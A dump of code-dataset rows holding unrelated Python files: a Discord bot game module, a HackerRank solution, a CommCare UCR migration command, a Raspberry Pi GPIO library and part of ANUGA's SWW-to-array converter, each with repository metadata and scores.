e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
await message.edit(embed = e, content = '')
return True
else:
return False
| import discord
import datetime
import json
import pickle
import yaml
from discord.ext import commands, tasks
from discord import Embed, Member
from datetime import timedelta
from itertools import cycle
import things.UTILITIES as utl
async def startgame(user, code, guild, bot):
x = datetime.datetime.now()
games = utl.r_games()
game = False
# looks to see if this player already has a game
for i,e in games.items():
if i == f'{user.id}':
game = True
break
if game == False:
gChannel = utl.settings()['GAME_CHANNEL']
gameChannel = bot.get_channel(gChannel)
currentPing = x
ping = ''
if utl.ping() == True:
ping = guild.get_role(utl.settings()['SQUIRREL_ROLE']).mention
# Sends game code
e = discord.Embed(colour=discord.Color.orange(),title=f"**{code}**",description='React with 🐿️ if you joined')
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
message = await gameChannel.send(embed = e, content = f'{ping}')
await message.add_reaction(emoji="🐿️")
try:
utl.w_pgames(user.id, 'pop')
except KeyError:
pass
games = utl.r_games()
# Writes the game to the Game JSON file
utl.w_games(user.id, [message.id,code,x.strftime("%Y.%m.%d.%H:%M:%S")])
return True
else:
return False
async def pgames(user):
pgames = utl.r_pgames()
code = ''
for i,e in pgames.items():
if i == f'{user.id}':
code = e[1]
return code
async def endgame(user, bot):
# Opens game file to find message ID and game code
games = utl.r_games()
game = False
for i,e in games.items():
if i == f'{user.id}':
game = True
# Gets the message ID and game code
if game == True:
contents = games[f'{user.id}']
messageID = contents[0]
code = contents[1]
# Removes game from games.json
utl.w_games(user.id, 'pop')
# Gets the message from the ID
gChannel = utl.settings()['GAME_CHANNEL']
channel = bot.get_channel(gChannel)
message = await channel.fetch_message(int(messageID))
# Edits the embed to say the game has ended
e = discord.Embed(colour=discord.Color.red(),title="*ENDED*",description=f"**{code}**")
e.set_footer(text=f'{user.name}#{user.discriminator}',icon_url=f'{user.avatar_url}')
await message.edit(embed = e, content = '')
return True
else:
return False
| en | 0.830078 | # looks to see if this player already has a game # Sends game code #{user.discriminator}',icon_url=f'{user.avatar_url}') # Writes the game to the Game JSON file # Opens game file to find message ID and game code # Gets the message ID and game code # Removes game from games.json # Gets the message from the ID # Edits the embed to say the game has ended #{user.discriminator}',icon_url=f'{user.avatar_url}') | 2.729856 | 3 |
Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py | akkik04/Python-DataStructures-and-Algorithms | 1 | 6632458 | <filename>Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py
# BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION:
# function receiving an argument as the candles array.
def birthdayCakeCandles(candles):
# declaring a variable to store the length of the candle array.
x = len(candles)
# declaring variables for the count and the maximum number.
maximum_number = 0
counter = 0
# for-loop to iterate for the length of the candle array.
for i in range (x):
# nested if-statement to determine if the count should be increased.
if candles[i] > maximum_number:
maximum_number = candles[i]
counter = 1
elif candles[i] == maximum_number:
counter+= 1
# returning count for the most common index.
return candles.count(max(candles))
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
print(birthdayCakeCandles(candles)) | <filename>Data Structures and Algorithms/HackerRank Algo Solutions/EASY PROBLEMS/BirthdayCakeCandles.py
# BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION:
# function receiving an argument as the candles array.
def birthdayCakeCandles(candles):
# declaring a variable to store the length of the candle array.
x = len(candles)
# declaring variables for the count and the maximum number.
maximum_number = 0
counter = 0
# for-loop to iterate for the length of the candle array.
for i in range (x):
# nested if-statement to determine if the count should be increased.
if candles[i] > maximum_number:
maximum_number = candles[i]
counter = 1
elif candles[i] == maximum_number:
counter+= 1
# returning count for the most common index.
return candles.count(max(candles))
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
print(birthdayCakeCandles(candles)) | en | 0.793482 | # BIRTHDAY CAKE CANDLES HACKER-RANK SOLUTION: # function receiving an argument as the candles array. # declaring a variable to store the length of the candle array. # declaring variables for the count and the maximum number. # for-loop to iterate for the length of the candle array. # nested if-statement to determine if the count should be increased. # returning count for the most common index. | 4.306523 | 4 |
custom/icds_reports/management/commands/migrate_ucr.py | kkrampa/commcare-hq | 1 | 6632459 | from __future__ import absolute_import, print_function
from __future__ import unicode_literals
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
from django.core.management.base import BaseCommand
from sqlalchemy import select
from corehq.apps.userreports.models import get_datasource_config
from corehq.apps.userreports.util import get_indicator_adapter
class Command(BaseCommand):
help = "Migrate data from one UCR to another"
def add_arguments(self, parser):
parser.add_argument('domain')
parser.add_argument('old_data_source_id')
parser.add_argument('new_data_source_id')
parser.add_argument('--date-column', default='inserted_at')
parser.add_argument('--initiated-by', action='store', required=True, dest='initiated',
help='Who initiated the rebuild')
def handle(self, domain, old_data_source_id, new_data_source_id, **options):
old_config, _ = get_datasource_config(old_data_source_id, domain)
new_config, _ = get_datasource_config(new_data_source_id, domain)
assert old_config.referenced_doc_type == new_config.referenced_doc_type
old_filter = old_config.get_case_type_or_xmlns_filter()
new_filter = new_config.get_case_type_or_xmlns_filter()
assert set(old_filter) == set(new_filter)
old_adapter = get_indicator_adapter(old_config)
new_adapter = get_indicator_adapter(new_config)
old_table = old_adapter.get_table()
new_table = new_adapter.get_table()
assert hasattr(old_table.columns, options['date_column'])
column = getattr(old_table.columns, options['date_column'])
new_adapter.build_table(initiated_by=options['initiated'], source='migrate_ucr')
end_date = date(2016, 1, 1)
query = self.insert_query(old_table, new_table, column, end_date=end_date)
self.run_query(new_adapter, query)
start_date = end_date
end_date = end_date + relativedelta(months=1)
while start_date < date.today():
query = self.insert_query(old_table, new_table, column, start_date, end_date)
self.run_query(new_adapter, query)
start_date += relativedelta(months=1)
end_date += relativedelta(months=1)
query = self.insert_query(old_table, new_table, column, start_date)
self.run_query(new_adapter, query)
def insert_query(self, old_table, new_table, column, start_date=None, end_date=None):
if start_date is None:
where_query = (column < end_date)
elif end_date is None:
where_query = (column >= start_date)
else:
where_query = (column >= start_date) & (column < end_date)
sel = select(old_table.c).where(where_query)
return new_table.insert().from_select(new_table.c, sel)
def run_query(self, adapter, query):
print(query)
print(datetime.utcnow())
with adapter.engine.begin() as connection:
connection.execute(query)
print("query complete")
| from __future__ import absolute_import, print_function
from __future__ import unicode_literals
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
from django.core.management.base import BaseCommand
from sqlalchemy import select
from corehq.apps.userreports.models import get_datasource_config
from corehq.apps.userreports.util import get_indicator_adapter
class Command(BaseCommand):
help = "Migrate data from one UCR to another"
def add_arguments(self, parser):
parser.add_argument('domain')
parser.add_argument('old_data_source_id')
parser.add_argument('new_data_source_id')
parser.add_argument('--date-column', default='inserted_at')
parser.add_argument('--initiated-by', action='store', required=True, dest='initiated',
help='Who initiated the rebuild')
def handle(self, domain, old_data_source_id, new_data_source_id, **options):
old_config, _ = get_datasource_config(old_data_source_id, domain)
new_config, _ = get_datasource_config(new_data_source_id, domain)
assert old_config.referenced_doc_type == new_config.referenced_doc_type
old_filter = old_config.get_case_type_or_xmlns_filter()
new_filter = new_config.get_case_type_or_xmlns_filter()
assert set(old_filter) == set(new_filter)
old_adapter = get_indicator_adapter(old_config)
new_adapter = get_indicator_adapter(new_config)
old_table = old_adapter.get_table()
new_table = new_adapter.get_table()
assert hasattr(old_table.columns, options['date_column'])
column = getattr(old_table.columns, options['date_column'])
new_adapter.build_table(initiated_by=options['initiated'], source='migrate_ucr')
end_date = date(2016, 1, 1)
query = self.insert_query(old_table, new_table, column, end_date=end_date)
self.run_query(new_adapter, query)
start_date = end_date
end_date = end_date + relativedelta(months=1)
while start_date < date.today():
query = self.insert_query(old_table, new_table, column, start_date, end_date)
self.run_query(new_adapter, query)
start_date += relativedelta(months=1)
end_date += relativedelta(months=1)
query = self.insert_query(old_table, new_table, column, start_date)
self.run_query(new_adapter, query)
def insert_query(self, old_table, new_table, column, start_date=None, end_date=None):
if start_date is None:
where_query = (column < end_date)
elif end_date is None:
where_query = (column >= start_date)
else:
where_query = (column >= start_date) & (column < end_date)
sel = select(old_table.c).where(where_query)
return new_table.insert().from_select(new_table.c, sel)
def run_query(self, adapter, query):
print(query)
print(datetime.utcnow())
with adapter.engine.begin() as connection:
connection.execute(query)
print("query complete")
| none | 1 | 1.849103 | 2 |
|
naive.py | LarsAstrom/Hashcode-final-2019 | 0 | 6632460 | import argparse
import random
from collections import defaultdict
from score import parse
# inp is an input file as a single string
# return your output as a string
def solve(seed, inp, log):
# TODO: Solve the problem
random.seed(seed)
ns = parse(inp)
uncomps = [i for i in range(ns.C)]
#cur_comp = 0
comp_files = [[False]*ns.C for _ in range(ns.S)]
repl = defaultdict(list)
nxt_avail_time = [0]*ns.S
MAX_T = max([t.d for t in ns.targets])
cur_comp_on_server = [-1]*ns.S
out = []
def is_compable(comp,s):
for dep in comp.deps:
if not comp_files[s][dep]: return False
return True
for t in range(MAX_T+1):
print 'Cur time: {}, Max time: {}, Uncompiled files {}'.format(t,MAX_T,len(uncomps))
for rep in repl[t]:
for s in range(ns.S):
comp_files[s][rep] = True
for s in range(ns.S):
if t<nxt_avail_time[s]: continue
if t==nxt_avail_time[s]: comp_files[s][cur_comp_on_server[s]] = True
for comp in uncomps:
if is_compable(ns.compilable[comp],s):
uncomps.remove(comp)
comp = ns.compilable[comp]
nxt_avail_time[s] = t + comp.c
repl[t+comp.c+comp.r].append(comp.i)
out.append((comp.name,s))
break
print len(out)
out2 = [str(len(out))] + [' '.join(map(str,o)) for o in out]
return '\n'.join(out2)
| import argparse
import random
from collections import defaultdict
from score import parse
# inp is an input file as a single string
# return your output as a string
def solve(seed, inp, log):
# TODO: Solve the problem
random.seed(seed)
ns = parse(inp)
uncomps = [i for i in range(ns.C)]
#cur_comp = 0
comp_files = [[False]*ns.C for _ in range(ns.S)]
repl = defaultdict(list)
nxt_avail_time = [0]*ns.S
MAX_T = max([t.d for t in ns.targets])
cur_comp_on_server = [-1]*ns.S
out = []
def is_compable(comp,s):
for dep in comp.deps:
if not comp_files[s][dep]: return False
return True
for t in range(MAX_T+1):
print 'Cur time: {}, Max time: {}, Uncompiled files {}'.format(t,MAX_T,len(uncomps))
for rep in repl[t]:
for s in range(ns.S):
comp_files[s][rep] = True
for s in range(ns.S):
if t<nxt_avail_time[s]: continue
if t==nxt_avail_time[s]: comp_files[s][cur_comp_on_server[s]] = True
for comp in uncomps:
if is_compable(ns.compilable[comp],s):
uncomps.remove(comp)
comp = ns.compilable[comp]
nxt_avail_time[s] = t + comp.c
repl[t+comp.c+comp.r].append(comp.i)
out.append((comp.name,s))
break
print len(out)
out2 = [str(len(out))] + [' '.join(map(str,o)) for o in out]
return '\n'.join(out2)
| en | 0.830088 | # inp is an input file as a single string # return your output as a string # TODO: Solve the problem #cur_comp = 0 | 2.825264 | 3 |
All_Source_Code/CleanseData/CleanseData_3.py | APMonitor/pds | 11 | 6632461 | <filename>All_Source_Code/CleanseData/CleanseData_3.py
result = z.dropna() | <filename>All_Source_Code/CleanseData/CleanseData_3.py
result = z.dropna() | none | 1 | 1.140392 | 1 |
|
agent_simple_cartpole.py | halcyoona/reinforcement-learning-demo | 0 | 6632462 | import gym
import random
class Agent():
def __init__(self, env):
self.action_size = env.action_space.n
print("Action Size: ", self.action_size)
def get_action(self, state):
# action = random.choice(range(self.action_size))
pole_angles = state[2]
action = 0 if pole_angles < 0 else 1
return action
if __name__ == "__main__":
game_name = "CartPole-v1"
env = gym.make(game_name)
agent = Agent(env)
state = env.reset()
for _ in range(200):
# action = env.action_space.sample()
action = agent.get_action(state)
state, reward, done, info = env.step(action)
env.render() | import gym
import random
class Agent():
def __init__(self, env):
self.action_size = env.action_space.n
print("Action Size: ", self.action_size)
def get_action(self, state):
# action = random.choice(range(self.action_size))
pole_angles = state[2]
action = 0 if pole_angles < 0 else 1
return action
if __name__ == "__main__":
game_name = "CartPole-v1"
env = gym.make(game_name)
agent = Agent(env)
state = env.reset()
for _ in range(200):
# action = env.action_space.sample()
action = agent.get_action(state)
state, reward, done, info = env.step(action)
env.render() | en | 0.36326 | # action = random.choice(range(self.action_size)) # action = env.action_space.sample() | 3.208847 | 3 |
NFC_Reader/quick2wire/gpio.py | lleon95/NFC_Points_Service | 46 | 6632463 | """A convenient API to access the GPIO pins of the Raspberry Pi.
"""
import os
import subprocess
from contextlib import contextmanager
from quick2wire.board_revision import revision
from quick2wire.selector import EDGE
def gpio_admin(subcommand, pin, pull=None):
if pull:
subprocess.check_call(["gpio-admin", subcommand, str(pin), pull])
else:
subprocess.check_call(["gpio-admin", subcommand, str(pin)])
Out = "out"
In = "in"
Rising = "rising"
Falling = "falling"
Both = "both"
PullDown = "pulldown"
PullUp = "pullup"
class PinAPI(object):
def __init__(self, bank, index):
self._bank = bank
self._index = index
@property
def index(self):
return self._index
@property
def bank(self):
return self._bank
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
value = property(lambda p: p.get(),
lambda p,v: p.set(v),
doc="""The value of the pin: 1 if the pin is high, 0 if the pin is low.""")
class PinBankAPI(object):
def __getitem__(self, n):
if 0 < n < len(self):
raise ValueError("no pin index {n} out of range", n=n)
return self.pin(n)
def write(self):
pass
def read(self):
pass
class Pin(PinAPI):
"""Controls a GPIO pin."""
__trigger__ = EDGE
def __init__(self, bank, index, soc_pin_number, direction=In, interrupt=None, pull=None):
"""Creates a pin
Parameters:
user_pin_number -- the identity of the pin used to create the derived class.
soc_pin_number -- the pin on the header to control, identified by the SoC pin number.
direction -- (optional) the direction of the pin, either In or Out.
interrupt -- (optional)
pull -- (optional)
Raises:
IOError -- could not export the pin (if direction is given)
"""
super(Pin,self).__init__(None, index)
self._soc_pin_number = soc_pin_number
self._file = None
self._direction = direction
self._interrupt = interrupt
self._pull = pull
@property
def soc_pin_number(self):
return self._soc_pin_number
def open(self):
gpio_admin("export", self.soc_pin_number, self._pull)
self._file = open(self._pin_path("value"), "r+")
self._write("direction", self._direction)
if self._direction == In:
self._write("edge", self._interrupt if self._interrupt is not None else "none")
def close(self):
if not self.closed:
if self.direction == Out:
self.value = 0
self._file.close()
self._file = None
self._write("direction", In)
self._write("edge", "none")
gpio_admin("unexport", self.soc_pin_number)
def get(self):
"""The current value of the pin: 1 if the pin is high or 0 if the pin is low.
The value can only be set if the pin's direction is Out.
Raises:
IOError -- could not read or write the pin's value.
"""
self._check_open()
self._file.seek(0)
v = self._file.read()
return int(v) if v else 0
def set(self, new_value):
self._check_open()
if self._direction != Out:
raise ValueError("not an output pin")
self._file.seek(0)
self._file.write(str(int(new_value)))
self._file.flush()
@property
def direction(self):
"""The direction of the pin: either In or Out.
The value of the pin can only be set if its direction is Out.
Raises:
IOError -- could not set the pin's direction.
"""
return self._direction
@direction.setter
def direction(self, new_value):
self._write("direction", new_value)
self._direction = new_value
@property
def interrupt(self):
"""The interrupt property specifies what event (if any) will raise an interrupt.
One of:
Rising -- voltage changing from low to high
Falling -- voltage changing from high to low
Both -- voltage changing in either direction
None -- interrupts are not raised
Raises:
IOError -- could not read or set the pin's interrupt trigger
"""
return self._interrupt
@interrupt.setter
def interrupt(self, new_value):
self._write("edge", new_value)
self._interrupt = new_value
@property
def pull(self):
return self._pull
def fileno(self):
"""Return the underlying file descriptor. Useful for select, epoll, etc."""
return self._file.fileno()
@property
def closed(self):
"""Returns if this pin is closed"""
return self._file is None or self._file.closed
def _check_open(self):
if self.closed:
raise IOError(str(self) + " is closed")
def _write(self, filename, value):
with open(self._pin_path(filename), "w+") as f:
f.write(value)
def _pin_path(self, filename=""):
return "/sys/devices/virtual/gpio/gpio%i/%s" % (self.soc_pin_number, filename)
def __repr__(self):
return self.__module__ + "." + str(self)
def __str__(self):
return "{type}({index})".format(
type=self.__class__.__name__,
index=self.index)
class PinBank(PinBankAPI):
def __init__(self, index_to_soc_fn, count=None):
super(PinBank,self).__init__()
self._index_to_soc = index_to_soc_fn
self._count = count
def pin(self, index, *args, **kwargs):
return Pin(self, index, self._index_to_soc(index), *args, **kwargs)
@property
def has_len(self):
return self._count is not None
def __len__(self):
if self._count is not None:
return self._count
else:
raise TypeError(self.__class__.__name__ + " has no len")
BUTTON = 0
LED = 1
SPI_INTERRUPT = 6
I2C_INTERRUPT = 7
_pi_revision = revision()
if _pi_revision == 0:
# Not running on the Raspberry Pi, so define no-op pin banks
pins = PinBank(lambda p: p)
pi_broadcom_soc = pins
pi_header_1 = pins
else:
def by_revision(d):
return d[_pi_revision]
# Maps header pin numbers to SoC GPIO numbers
# See http://elinux.org/RPi_Low-level_peripherals
#
# Note: - header pins are numbered from 1, SoC GPIO from zero
# - the Pi documentation identifies some header pins as GPIO0,
# GPIO1, etc., but these are not the same as the SoC GPIO
# numbers.
_pi_header_1_pins = {
3: by_revision({1:0, 2:2}),
5: by_revision({1:1, 2:3}),
7: 4,
8: 14,
10: 15,
11: 17,
12: 18,
13: by_revision({1:21, 2:27}),
15: 22,
16: 23,
18: 24,
19: 10,
21: 9,
22: 25,
23: 11,
24: 8,
26: 7
}
_pi_gpio_pins = [_pi_header_1_pins[i] for i in [11, 12, 13, 15, 16, 18, 22, 7]]
def lookup(pin_mapping, i):
try:
if i >= 0:
return pin_mapping[i]
except LookupError:
pass
raise IndexError(str(i) + " is not a valid pin index")
def map_with(pin_mapping):
return lambda i: lookup(pin_mapping,i)
pi_broadcom_soc = PinBank(lambda p: p)
pi_header_1 = PinBank(map_with(_pi_header_1_pins))
pins = PinBank(map_with(_pi_gpio_pins), len(_pi_gpio_pins))
| """A convenient API to access the GPIO pins of the Raspberry Pi.
"""
import os
import subprocess
from contextlib import contextmanager
from quick2wire.board_revision import revision
from quick2wire.selector import EDGE
def gpio_admin(subcommand, pin, pull=None):
if pull:
subprocess.check_call(["gpio-admin", subcommand, str(pin), pull])
else:
subprocess.check_call(["gpio-admin", subcommand, str(pin)])
Out = "out"
In = "in"
Rising = "rising"
Falling = "falling"
Both = "both"
PullDown = "pulldown"
PullUp = "pullup"
class PinAPI(object):
def __init__(self, bank, index):
self._bank = bank
self._index = index
@property
def index(self):
return self._index
@property
def bank(self):
return self._bank
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
value = property(lambda p: p.get(),
lambda p,v: p.set(v),
doc="""The value of the pin: 1 if the pin is high, 0 if the pin is low.""")
class PinBankAPI(object):
def __getitem__(self, n):
if 0 < n < len(self):
raise ValueError("no pin index {n} out of range", n=n)
return self.pin(n)
def write(self):
pass
def read(self):
pass
class Pin(PinAPI):
"""Controls a GPIO pin."""
__trigger__ = EDGE
def __init__(self, bank, index, soc_pin_number, direction=In, interrupt=None, pull=None):
"""Creates a pin
Parameters:
user_pin_number -- the identity of the pin used to create the derived class.
soc_pin_number -- the pin on the header to control, identified by the SoC pin number.
direction -- (optional) the direction of the pin, either In or Out.
interrupt -- (optional)
pull -- (optional)
Raises:
IOError -- could not export the pin (if direction is given)
"""
super(Pin,self).__init__(None, index)
self._soc_pin_number = soc_pin_number
self._file = None
self._direction = direction
self._interrupt = interrupt
self._pull = pull
@property
def soc_pin_number(self):
return self._soc_pin_number
def open(self):
gpio_admin("export", self.soc_pin_number, self._pull)
self._file = open(self._pin_path("value"), "r+")
self._write("direction", self._direction)
if self._direction == In:
self._write("edge", self._interrupt if self._interrupt is not None else "none")
def close(self):
if not self.closed:
if self.direction == Out:
self.value = 0
self._file.close()
self._file = None
self._write("direction", In)
self._write("edge", "none")
gpio_admin("unexport", self.soc_pin_number)
def get(self):
"""The current value of the pin: 1 if the pin is high or 0 if the pin is low.
The value can only be set if the pin's direction is Out.
Raises:
IOError -- could not read or write the pin's value.
"""
self._check_open()
self._file.seek(0)
v = self._file.read()
return int(v) if v else 0
def set(self, new_value):
self._check_open()
if self._direction != Out:
raise ValueError("not an output pin")
self._file.seek(0)
self._file.write(str(int(new_value)))
self._file.flush()
@property
def direction(self):
"""The direction of the pin: either In or Out.
The value of the pin can only be set if its direction is Out.
Raises:
IOError -- could not set the pin's direction.
"""
return self._direction
@direction.setter
def direction(self, new_value):
self._write("direction", new_value)
self._direction = new_value
@property
def interrupt(self):
"""The interrupt property specifies what event (if any) will raise an interrupt.
One of:
Rising -- voltage changing from low to high
Falling -- voltage changing from high to low
Both -- voltage changing in either direction
None -- interrupts are not raised
Raises:
IOError -- could not read or set the pin's interrupt trigger
"""
return self._interrupt
@interrupt.setter
def interrupt(self, new_value):
self._write("edge", new_value)
self._interrupt = new_value
@property
def pull(self):
return self._pull
def fileno(self):
"""Return the underlying file descriptor. Useful for select, epoll, etc."""
return self._file.fileno()
@property
def closed(self):
"""Returns if this pin is closed"""
return self._file is None or self._file.closed
def _check_open(self):
if self.closed:
raise IOError(str(self) + " is closed")
def _write(self, filename, value):
with open(self._pin_path(filename), "w+") as f:
f.write(value)
def _pin_path(self, filename=""):
return "/sys/devices/virtual/gpio/gpio%i/%s" % (self.soc_pin_number, filename)
def __repr__(self):
return self.__module__ + "." + str(self)
def __str__(self):
return "{type}({index})".format(
type=self.__class__.__name__,
index=self.index)
class PinBank(PinBankAPI):
def __init__(self, index_to_soc_fn, count=None):
super(PinBank,self).__init__()
self._index_to_soc = index_to_soc_fn
self._count = count
def pin(self, index, *args, **kwargs):
return Pin(self, index, self._index_to_soc(index), *args, **kwargs)
@property
def has_len(self):
return self._count is not None
def __len__(self):
if self._count is not None:
return self._count
else:
raise TypeError(self.__class__.__name__ + " has no len")
BUTTON = 0
LED = 1
SPI_INTERRUPT = 6
I2C_INTERRUPT = 7
_pi_revision = revision()
if _pi_revision == 0:
# Not running on the Raspberry Pi, so define no-op pin banks
pins = PinBank(lambda p: p)
pi_broadcom_soc = pins
pi_header_1 = pins
else:
def by_revision(d):
return d[_pi_revision]
# Maps header pin numbers to SoC GPIO numbers
# See http://elinux.org/RPi_Low-level_peripherals
#
# Note: - header pins are numbered from 1, SoC GPIO from zero
# - the Pi documentation identifies some header pins as GPIO0,
# GPIO1, etc., but these are not the same as the SoC GPIO
# numbers.
_pi_header_1_pins = {
3: by_revision({1:0, 2:2}),
5: by_revision({1:1, 2:3}),
7: 4,
8: 14,
10: 15,
11: 17,
12: 18,
13: by_revision({1:21, 2:27}),
15: 22,
16: 23,
18: 24,
19: 10,
21: 9,
22: 25,
23: 11,
24: 8,
26: 7
}
_pi_gpio_pins = [_pi_header_1_pins[i] for i in [11, 12, 13, 15, 16, 18, 22, 7]]
def lookup(pin_mapping, i):
try:
if i >= 0:
return pin_mapping[i]
except LookupError:
pass
raise IndexError(str(i) + " is not a valid pin index")
def map_with(pin_mapping):
return lambda i: lookup(pin_mapping,i)
pi_broadcom_soc = PinBank(lambda p: p)
pi_header_1 = PinBank(map_with(_pi_header_1_pins))
pins = PinBank(map_with(_pi_gpio_pins), len(_pi_gpio_pins))
| en | 0.789349 | A convenient API to access the GPIO pins of the Raspberry Pi. The value of the pin: 1 if the pin is high, 0 if the pin is low. Controls a GPIO pin. Creates a pin Parameters: user_pin_number -- the identity of the pin used to create the derived class. soc_pin_number -- the pin on the header to control, identified by the SoC pin number. direction -- (optional) the direction of the pin, either In or Out. interrupt -- (optional) pull -- (optional) Raises: IOError -- could not export the pin (if direction is given) The current value of the pin: 1 if the pin is high or 0 if the pin is low. The value can only be set if the pin's direction is Out. Raises: IOError -- could not read or write the pin's value. The direction of the pin: either In or Out. The value of the pin can only be set if its direction is Out. Raises: IOError -- could not set the pin's direction. The interrupt property specifies what event (if any) will raise an interrupt. One of: Rising -- voltage changing from low to high Falling -- voltage changing from high to low Both -- voltage changing in either direction None -- interrupts are not raised Raises: IOError -- could not read or set the pin's interrupt trigger Return the underlying file descriptor. Useful for select, epoll, etc. Returns if this pin is closed # Not running on the Raspberry Pi, so define no-op pin banks # Maps header pin numbers to SoC GPIO numbers # See http://elinux.org/RPi_Low-level_peripherals # # Note: - header pins are numbered from 1, SoC GPIO from zero # - the Pi documentation identifies some header pins as GPIO0, # GPIO1, etc., but these are not the same as the SoC GPIO # numbers. | 3.588705 | 4 |
anuga/file_conversion/sww2array.py | GeoscienceAustralia/anuga_core | 136 | 6632464 | <gh_stars>100-1000
"""
Module to convert SWW files to numpy arrays.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# external modules
from builtins import str
from builtins import range
from past.utils import old_div
from future.utils import raise_
import os
import numpy as num
# ANUGA modules
from anuga.abstract_2d_finite_volumes.util import remove_lone_verts
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.utilities.system_tools import get_vars_in_expression
import anuga.utilities.log as log
from anuga.utilities.file_utils import get_all_swwfiles
######
# formula mappings
######
quantity_formula = {'momentum':'(xmomentum**2 + ymomentum**2)**0.5',
'depth':'stage-elevation',
'speed': \
'(xmomentum**2 + ymomentum**2)**0.5/(stage-elevation+1.e-6/(stage-elevation))'}
# Default block size for sww2dem()
DEFAULT_BLOCK_SIZE = 100000
def sww2array(name_in,
quantity=None, # defaults to elevation
reduction=None,
cellsize=10,
number_of_decimal_places=None,
NODATA_value=-9999.0,
easting_min=None,
easting_max=None,
northing_min=None,
northing_max=None,
verbose=False,
origin=None,
datum='WGS84',
block_size=None):
"""Read SWW file and convert to a numpy array (can be stored to a png file later)
The parameter quantity must be the name of an existing quantity or
an expression involving existing quantities. The default is
'elevation'. Quantity is not a list of quantities.
If reduction is given and it's an index, sww2array will output the quantity at that time-step.
If reduction is given and it's a built in function (eg max, min, mean), then that
function is used to reduce the quantity over all time-steps. If reduction is not given,
reduction is set to "max" by default.
    datum - (optional) datum name for the projection (default 'WGS84')
block_size - sets the number of slices along the non-time axis to
process in one block.
"""
import sys
import types
from anuga.geometry.polygon import inside_polygon, outside_polygon
from anuga.abstract_2d_finite_volumes.util import \
apply_expression_to_dictionary
basename_in, in_ext = os.path.splitext(name_in)
if in_ext != '.sww':
raise IOError('Input format for %s must be .sww' % name_in)
false_easting = 500000
false_northing = 10000000
if quantity is None:
quantity = 'elevation'
if reduction is None:
reduction = max
if quantity in quantity_formula:
quantity = quantity_formula[quantity]
if number_of_decimal_places is None:
number_of_decimal_places = 3
if block_size is None:
block_size = DEFAULT_BLOCK_SIZE
    assert isinstance(block_size, (int, float))
# Read sww file
if verbose:
log.critical('Reading from %s' % name_in)
from anuga.file.netcdf import NetCDFFile
fid = NetCDFFile(name_in)
#Get extent and reference
x = num.array(fid.variables['x'], num.float)
y = num.array(fid.variables['y'], num.float)
volumes = num.array(fid.variables['volumes'], num.int)
if type(reduction) is not types.BuiltinFunctionType:
times = fid.variables['time'][reduction]
else:
times = fid.variables['time'][:]
number_of_timesteps = fid.dimensions['number_of_timesteps']
number_of_points = fid.dimensions['number_of_points']
if origin is None:
# Get geo_reference
# sww files don't have to have a geo_ref
try:
geo_reference = Geo_reference(NetCDFObject=fid)
except AttributeError as e:
geo_reference = Geo_reference() # Default georef object
xllcorner = geo_reference.get_xllcorner()
yllcorner = geo_reference.get_yllcorner()
zone = geo_reference.get_zone()
else:
zone = origin[0]
xllcorner = origin[1]
yllcorner = origin[2]
# FIXME: Refactor using code from Interpolation_function.statistics
# (in interpolate.py)
# Something like print swwstats(swwname)
if verbose:
log.critical('------------------------------------------------')
log.critical('Statistics of SWW file:')
log.critical(' Name: %s' % name_in)
log.critical(' Reference:')
log.critical(' Lower left corner: [%f, %f]' % (xllcorner, yllcorner))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' Time: %f' % times)
else:
log.critical(' Start time: %f' % fid.starttime[0])
log.critical(' Extent:')
log.critical(' x [m] in [%f, %f], len(x) == %d'
%(num.min(x), num.max(x), len(x.flat)))
log.critical(' y [m] in [%f, %f], len(y) == %d'
% (num.min(y), num.max(y), len(y.flat)))
if type(reduction) is not types.BuiltinFunctionType:
log.critical(' t [s] = %f, len(t) == %d' % (times, 1))
else:
log.critical(' t [s] in [%f, %f], len(t) == %d'
% (min(times), max(times), len(times)))
log.critical(' Quantities [SI units]:')
        # The following statistics loop may be commented out to reduce memory consumption
for name in ['stage', 'xmomentum', 'ymomentum']:
q = fid.variables[name][:].flatten()
if type(reduction) is not types.BuiltinFunctionType:
q = q[reduction*len(x):(reduction+1)*len(x)]
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
for name in ['elevation']:
q = fid.variables[name][:].flatten()
if verbose: log.critical(' %s in [%f, %f]'
% (name, min(q), max(q)))
# Get the variables in the supplied expression.
# This may throw a SyntaxError exception.
var_list = get_vars_in_expression(quantity)
# Check that we have the required variables in the SWW file.
missing_vars = []
for name in var_list:
try:
_ = fid.variables[name]
except KeyError:
missing_vars.append(name)
if missing_vars:
msg = ("In expression '%s', variables %s are not in the SWW file '%s'"
% (quantity, str(missing_vars), name_in))
raise_(Exception, msg)
# Create result array and start filling, block by block.
result = num.zeros(number_of_points, num.float)
if verbose:
msg = 'Slicing sww file, num points: ' + str(number_of_points)
msg += ', block size: ' + str(block_size)
log.critical(msg)
for start_slice in range(0, number_of_points, block_size):
# Limit slice size to array end if at last block
end_slice = min(start_slice + block_size, number_of_points)
# Get slices of all required variables
if type(reduction) is not types.BuiltinFunctionType:
q_dict = {}
for name in var_list:
# check if variable has time axis
if len(fid.variables[name].shape) == 2:
print('avoiding large array')
q_dict[name] = fid.variables[name][reduction,start_slice:end_slice]
else: # no time axis
q_dict[name] = fid.variables[name][start_slice:end_slice]
# Evaluate expression with quantities found in SWW file
res = apply_expression_to_dictionary(quantity, q_dict)
# if len(res.shape) == 2:
# new_res = num.zeros(res.shape[1], num.float)
# for k in xrange(res.shape[1]):
# if type(reduction) is not types.BuiltinFunctionType:
# new_res[k] = res[k]
# else:
# new_res[k] = reduction(res[:,k])
# res = new_res
else:
q_dict = {}
for name in var_list:
